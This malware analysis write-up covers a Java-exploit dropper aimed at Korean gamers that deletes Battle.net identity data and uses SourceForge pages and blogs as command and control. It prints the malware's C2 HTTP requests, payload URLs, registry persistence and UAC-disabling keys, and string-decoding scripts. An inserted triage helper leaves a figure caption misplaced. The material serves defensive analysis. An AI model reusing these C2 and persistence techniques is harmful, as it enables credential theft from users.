Police? Yes, I lost my lvl 100 mage...
I recently came across an interesting sample being spread through Java exploits in the wild which appeared to do nothing more than download some additional credential stealing/account harvesting malware and delete a victim's Battle.net account information. It seems the author has a bone to pick with Korean gamers for whatever reason based upon targeting, but my current conjecture is it's probably because of their epic dominance of StarCraft. Battle.net accounts are also used in other large popular online games including Diablo III and World of Warcraft, both of which have substantial online economies built around them where players can buy and sell equipment and resources using actual currency. The interesting aspect of these particular samples is the use of Sourceforge account pages as a means of command and control in addition to public blog sites. The nationality of the author is speculative, based on Chinese language resources in 2nd stage payloads as well as the username gao200511. gao200511 was used in one of the very first Sourceforge C2s, and the email address firstname.lastname@example.org was used to make several posts in association with a well-known Chinese hacking group, Ph4nt0m.
The exploit used an embedded malicious Java applet in the HTML, which upon successful exploitation will execute a binary stored as a byte array within the same page. Upon successful exploitation the binary will be written to the user's %temp% folder with the name rund11.exe and executed.
    <applet archive="game.jar" code="MainCls.class" width="0" height="0">
        <param name="datas" value="4D5A900003 " />
File Size: 53,760 Bytes
File System Changes:
- %systemroot%\system32\test.dat (deleted)
Note: test.dat is used to test write permission to the system directory
- %temp%\rund11.exe (deleted)
- HKLM\Software\Microsoft\Windows\Help\Help Version (Encoded C2)
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AhnLab V3Lite Update Process
- HKLM\Software\Blizzard Entertainment\Battle.net\Identity (Deletes this Key if Present)
- HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin -> 0 (Vista and Above)
- Registry Run Key in the Current User's Profile:
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AhnLab V3Lite Update Process which points to %temp%\v3liverun.exe
The binary employs a simple ordinal encoding to obfuscate C2 information and the names of API functions that might otherwise trigger AV heuristics: each character is stored as its zero-padded three-digit decimal ordinal. The Python function below can be used to decode these strings.
    def decode_easy(st):
        # Each character is stored as a zero-padded three-digit decimal ordinal
        out = ''
        for i in range(0, len(st) // 3):
            num = st[(i*3):(i*3)+3]
            out += chr(int(num))
        return out
Figure 1: Python Script to Decode Strings in Binary
For example, using the script above on the following string 104116116112115058047047115111117114099101102111114103101046110101116047117115101114115047110101119045119111114108100 decodes to https://sourceforge.net/users/new-world. Once rund11.exe is executed it checks for Internet connectivity by making a TCP connection to www.naver.com. If successful the binary will then connect to the C2, https://sourceforge.net/users/new-world, using standard HTTPS on TCP port 443. It also makes the same request over HTTP using a static User-Agent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322).
    GET /users/new-world HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
    Connection: Keep-Alive
    Cache-Control: no-cache
    Host: sourceforge.net
Figure 2: HTTP Request to "sourceforge.net"
The page retrieved will look something like the screenshot below:
The malware checks the <title> tag within the returned HTML and decodes this string to obtain an additional website to contact. The following Python snippet can be used to decode the command above:
    def decode_url(st):
        # 'Y' and 'X' stand in for '.' and '/'; every other character is shifted
        out = ''
        for i in st:
            i = ord(i)
            if i == 0x59:
                out += chr(0x2E)   # 'Y' -> '.'
            elif i == 0x58:
                out += chr(0x2F)   # 'X' -> '/'
            else:
                if i < 0x76:
                    new = i + 0x5
                else:
                    new = i - 0x15
                out += chr(new)
        return out
Figure 3: Python Snippet to Decode Embedded Instructions
Using the decode script above on the string rrrYvkmdghpndxYxjhXuYbda yields the website www.aprilmusic.com/z.gif. The malware also stores the encoded value retrieved from the page in the registry key HKLM\SOFTWARE\Microsoft\Windows\Help\Help Version. It will then connect to this website and download, decode, and execute the file. The z.gif file was actually an executable encoded by a single-byte XOR against the key 0x95 and renamed with a GIF extension. This particular sample also connected to kooor1.blogspot.kr on TCP port 80 after the initial check-in, using a hardcoded User-Agent. This site appears to be some kind of simple counter used by the attackers, as no content resided on the webpage.
    GET /2013/03/kor.html?m=1 HTTP/1.0
    User-Agent: Mozilla/5.0 (iPhone:U;CPU iPhone OS 4_1 like Mac OS X;zh-cn) AppleWebKit/532.9(KHTML,like Gecko)Version/4.0.5 Mobile/8B117 Safari/6531.22.7
    Host: kooor1.blogspot.kr
    Pragma: no-cache
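For responders who recover one of these ".gif" downloads from a proxy cache or disk, the following added triage helper (not part of the original write-up or the malware) reverses the single-byte 0x95 XOR described above, confirms the result is a PE file by walking the MZ header to the PE signature, and compares the MD5 to the two post-XOR hashes listed in this write-up. The sample input is a constructed minimal MZ/PE header, not a real payload.

```python
import hashlib
import struct

XOR_KEY = 0x95  # single-byte key the write-up reports for z.gif / y.gif

# MD5s listed in the write-up for the two decoded payloads
KNOWN_MD5S = {
    "f77b6f92909fb7b9f223279d76de49be",
    "85a4a9cf756b751a1c986cee76485929",
}

def xor_decode(data: bytes, key: int = XOR_KEY) -> bytes:
    """Undo the single-byte XOR that disguises the executable as a GIF (symmetric)."""
    return bytes(b ^ key for b in data)

def looks_like_pe(data: bytes) -> bool:
    """Check for an MZ stub whose e_lfanew field points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # An out-of-range offset just yields a short slice, which fails the compare
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def triage_gif_payload(raw: bytes) -> dict:
    """Decode a downloaded '.gif' and report whether it is really a PE file."""
    if raw[:6] in (b"GIF87a", b"GIF89a"):
        # A genuine image was served; nothing to decode
        return {"is_pe": False, "md5": None, "known": False}
    decoded = xor_decode(raw)
    md5 = hashlib.md5(decoded).hexdigest()
    return {"is_pe": looks_like_pe(decoded), "md5": md5, "known": md5 in KNOWN_MD5S}

def build_fake_pe() -> bytes:
    """Constructed stand-in for a payload: minimal MZ header, PE signature at 0x80."""
    header = bytearray(0x84)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x80)
    header[0x80:0x84] = b"PE\x00\x00"
    return bytes(header)

if __name__ == "__main__":
    # Encode the constructed header the way the attacker did, then triage it
    on_the_wire = xor_decode(build_fake_pe())
    print(triage_gif_payload(on_the_wire))
```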
Figure 4: Additional HTTP Request Sent by the Malware
rund11.exe will copy itself to %temp%\v3liverun.exe and delete itself after successful communication with the C2. It also creates a simple Run Key under the name AhnLab V3Lite Update Process in the current user's profile to establish persistence.
File Size: 189,952 Bytes
MD5 After XOR: F77B6F92909FB7B9F223279D76DE49BE
File Size: 145,408 Bytes
MD5 After XOR: 85A4A9CF756B751A1C986CEE76485929
Numerous other binaries were also stored on the compromised aprilmusic.com website as one-letter GIF files. The site appears to be a legitimate Korean audio equipment dealer. It should also be noted that between the time of initial analysis and this write-up the command was changed to rrrYvkmdghpndxYxjhXtYbda, which decodes to www.aprilmusic.com/y.gif. The two binaries were substantially different: z.gif dropped a keylogger implemented as a kernel driver that was only activated once a user visited specific websites, while y.gif dropped a browser helper object that harvested credentials from PayPal, MtGox (bitcoin), and two popular online game trading platforms. Cylance Labs is continuing to investigate and will post any interesting details as they arise.
Prior C2 Information
Sourceforge.net C2 Pages:
All of these user accounts have been shut down by Sourceforge at the time of this write-up, but were actively used in similar samples in the past as well as the following blog sites:
Blog Page Counters:
Additional Encoded GIF Malware Sites: